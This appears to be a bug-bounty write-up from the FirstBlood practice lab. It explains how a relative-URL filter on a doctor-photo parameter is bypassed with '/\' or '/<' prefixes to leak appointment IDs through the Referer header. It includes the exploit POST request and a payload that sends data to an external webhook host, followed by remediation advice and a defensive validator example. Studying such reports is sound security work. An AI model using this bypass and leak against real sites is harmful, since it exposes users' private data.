FirstBlood #1395: Appointment leakage
This issue was discovered on FirstBlood v3
On 2022-12-09, pichik Level 4 reported:

Hello zseano,

This one hit me right in my heart, I love hunting for bugs like this in the wild.

DESCRIPTION

So, as an admin you can edit doctor info here:
https://019046743f9e-pichik.a.firstbloodhackers.com/drpanel/edit-doctor.php?id=1
If you visit this endpoint, there is a warning "Photos can not be changed", which of course means that they can be edited somehow.
By intercepting the request after submitting our changes to the doctor, we can try a new parameter, photo. This one will not work, but the response reveals a new parameter, photoUrl:

Now if we add any external URL there, it errors out with: photoUrl must be a relative URL!
This can be bypassed in two ways: /\google.com or /</google.com, as < is filtered.
I was looking to insert XSS there through SVG and other ways, but wasn't able to, as new browsers won't execute any scripts in an <img src=''> attribute.

It took me so long, but finally I got an idea: leak the appointment ID through the referer header.
Here is a small issue: neither Chrome nor Firefox nor Edge will send the full referer header cross-domain.
It looked like this: referer https://019046743f9e-pichik.a.firstbloodhackers.com/ - only the domain name was sent.
I had some issues with Internet Explorer, so I skipped testing that and was thinking to chain it with some XSS,
but then I realized two things:

  1. We don't consider viewing another user's appointment as the ID is GUID4 and it's up to the users not to leak this, however if it can be leaked on our site without the use of XSS then that is something we consider an issue as we have various new API calls
    It looks like it would be out of scope, though I am not sure that holds when it is chained like this.
  2. In the previous event there was some tricky XSS, which fired only in Internet Explorer
    I fixed my Internet Explorer and visited my appointment, and of course the entire URL in the referer header was sent!!!
    And in Internet Explorer you need to use the /</google.com version, as /\ doesn't work there.

POC SCREEN:

Here is the request:

POST /drpanel/drapi/edit-dr.php HTTP/1.1
Host: 019046743f9e-pichik.a.firstbloodhackers.com
Cookie: drps=2050d3c4f04943f7439d7e65c
Content-Type: application/x-www-form-urlencoded

drid=1&name=test&bio=test&bookable=0&photoUrl=/>/webhook.site/[your-id]

IMPACT:

This will trigger every time a user visits his appointment and his doctor's photo is shown.
An attacker can combine this attack with the CSRF in my previous report to leak the appointment IDs of users registered to the corresponding doctor.
If Internet Explorer is not enough, it can also be combined with XSS, as on the same domain the URL in the referer header is preserved whole.

REMEDIATION:

Remove the photoUrl parameter on the server side if it should not be used.
Add better prevention against absolute URLs, as this one can be easily bypassed.
Do not allow / or \ at the beginning of the URL.

(This one made me really happy! So, thanks again for the great work!)
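The following is an added illustration of the remediation described in the report above; it is not pichik's code or FirstBlood's, and the filter, function names and sample values are constructed stand-ins. It contrasts a check that only rejects URLs with a scheme or authority (which lets /\host and /</host through, because the server strips < after validating and browsers read /\ as //) with one that sanitises first and then allows only a single leading slash.

```python
"""Relative-URL validation for a photoUrl-style parameter (constructed example)."""
import re
from typing import Optional
from urllib.parse import urlsplit


def strip_angle_brackets(value: str) -> str:
    """Constructed stand-in for the server's filter: drop '<' and '>'."""
    return value.replace("<", "").replace(">", "")


def weak_is_relative(value: str) -> bool:
    """Naive check: no scheme and no '//' authority according to urlsplit."""
    parts = urlsplit(value)
    return parts.scheme == "" and parts.netloc == ""


def weak_accept(value: str) -> Optional[str]:
    """Validate, then sanitise. urlsplit does not treat '\\' specially, and the
    '<' removal happens after the check, so '/\\host' and '/</host' both survive
    and end up stored as a protocol-relative URL."""
    if not weak_is_relative(value):
        return None
    return strip_angle_brackets(value)


# One leading '/', not followed by '/' or '\', then a conservative path charset.
_SAFE_PATH = re.compile(r"^/(?![/\\])[A-Za-z0-9._~!$&'()*+,;=:@%/-]*$")


def strong_accept(value: str) -> Optional[str]:
    """Sanitise first, then validate exactly the string that will be stored.
    Any backslash is rejected outright, since browsers turn '/\\' into '//'."""
    cleaned = strip_angle_brackets(value)
    if "\\" in cleaned or not _SAFE_PATH.match(cleaned):
        return None
    return cleaned


def browser_view(stored: str) -> str:
    """How an <img src> consumer reads the stored value: WHATWG URL parsing maps a
    backslash in the leading slashes to '/', so '/\\host' means '//host'."""
    if re.match(r"^[/\\]{2}", stored):
        return "protocol-relative -> //" + stored[2:]
    return "same-origin path -> " + stored
```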

P3 Medium

Endpoint: /drpanel/drapi/edit-dr.php

Parameter: photoUrl

Payload: /</webhook.site/[your-id]
FirstBlood ID: 60
Vulnerability Type: Application/Business Logic

The parameter "photoUrl" on /drapi/edit-dr.php should only allow for relative URL paths but this can be bypassed.

FirstBlood ID: 61
Vulnerability Type: Application/Business Logic

It mentions that doctor photos can NOT be modified, but it is actually possible to modify them.

Report Feedback

@zseano

Creator & Administrator


Congratulations, you were first to discover that you can use NON-relative URL paths in the photoUrl parameter! I am also awarding a further bounty at my own discretion for building a great proof of concept.